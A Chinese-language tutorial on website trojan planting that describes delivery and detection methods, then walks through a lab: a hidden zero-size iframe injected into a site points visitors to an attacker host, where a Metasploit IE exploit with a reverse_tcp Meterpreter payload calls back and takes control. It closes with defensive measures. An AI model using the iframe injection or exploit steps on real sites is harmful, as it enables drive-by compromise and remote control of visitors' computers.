網站掛馬原理及實戰

注:本文僅供學習參考

網頁掛馬簡介 網頁掛馬指的是把一個木馬程式上傳到一個網站裡面,然後用木馬生成器生成一個網馬,放到網頁空間裡面,再加程式碼使得木馬在打開網頁時運行。

網頁掛馬工作原理 作為網頁掛馬的散布者,其目的是將木馬下載到用戶本地並進一步執行,當木馬得到執行後,就意味著會有更多的木馬被下載,且進一步被執行。這樣就進入一個惡性的循環,從而使用戶的電腦遭到攻擊和控制。為達到目的首先要將木馬下載到本地。

常見方式

1將木馬偽裝為頁面元素,木馬則會被瀏覽器自動下載到本地。    2利用腳本運行的漏洞下載木馬。    3利用腳本運行的漏洞釋放隱含在網頁腳本中的木馬。    4將木馬偽裝成缺失的組件,或和缺失的組件捆綁在一起,如flash播放插件。這樣既達到了下載的目的,下載的組件又會被瀏覽器自動執行。    5通過腳本運行調用某些com組件,利用其漏洞下載木馬。    6在渲染頁面內容的過程中,利用格式溢出釋放木馬,如ani格式溢出漏洞。    7在渲染頁面內容的過程中,利用格式溢出下載木馬,如flash9.0.115播放漏洞。

檢測方式

  1特徵匹配:將網頁掛馬的腳本按腳本病毒進行檢測,但是網頁腳本變形方式、加密方式比起傳統的PE格式病毒更為多樣,檢測起來也更加困難。      2主動防禦:當瀏覽器要進行某些動作時,作出提示,如下載了某插件的安裝包,會提示是否運行。比如瀏覽器創建暴風影音播放器時,提示是否允許運行,大多數情況下用戶會點擊是,網頁木馬會因此得到執行。      3檢查父進程是否為瀏覽器,這種方法很容易被躲過且會對很多插件造成誤報。

網站掛馬實驗 準備win7實驗機和kali kali ip地址為10.1.1.101 1.將以下程式碼插進我們準備的網站中

<iframe src=地址 width=0 height=0></iframe>

將寬度高度都設為0,這個地址就會變成透明,不查看源程式碼的話是發現不了的 這裡的網馬地址設置為http://10.1.1.101:8060/test.html當用戶訪問到我們這個地址時,會自動訪問http://10.1.1.101:8060/test.html,木馬會被瀏覽下載到本地

2.利用ms11_003IE漏洞攻擊win7主機 執行命令

use exploit/windows/browser/ ms11_003_ie_css_import』,選擇漏洞利用EXP  設置SRVPORT URIPATH與網馬中的src一致  set SRVPORT 8060  set URIPATH test.html  運行命令set payload windows/meterpreter/reverse_tcp 設置攻擊載荷進行回連  set lhost 10.1.1.101 設置回連的IP地址  set lport 1234設置回連埠號  show options  最後設置完看下圖

執行run命令 好戲上場 這時打開win7實驗機,打開IE,模擬受害者訪問http://10.1.1.101/index.html

在kali端成功看到受害者主機上線

成功使用sysinfo查看主機資訊

使用Screenshot查看win7實驗機的螢幕截圖(win7待機了)

包括後面收集資訊屬於後滲透環節,本文不做討論。

防禦措施

1對開放上傳附件功能的網站,一定要進行身份認證,並只允許信任的人使用上傳程式。    2保證所使用的程式及時地更新。    3不要在前台網頁加註後台管理程式登錄頁面的鏈接。    4時常備份資料庫等文件,但是不要把備份數據放在程式默認的備份目錄下。    5管理員的用戶名和密碼要有一定複雜性。    6 IIS中禁止目錄的寫入和執行功能,可以有效防止asp木馬。    7在伺服器、虛擬主機控制面板設置執行許可權選項中,將有上傳許可權的目錄取消asp的運行許可權。    8創建一個robots.txt上傳到網站根目錄,Robots能夠有效防範利用搜索引擎竊取資訊的駭客。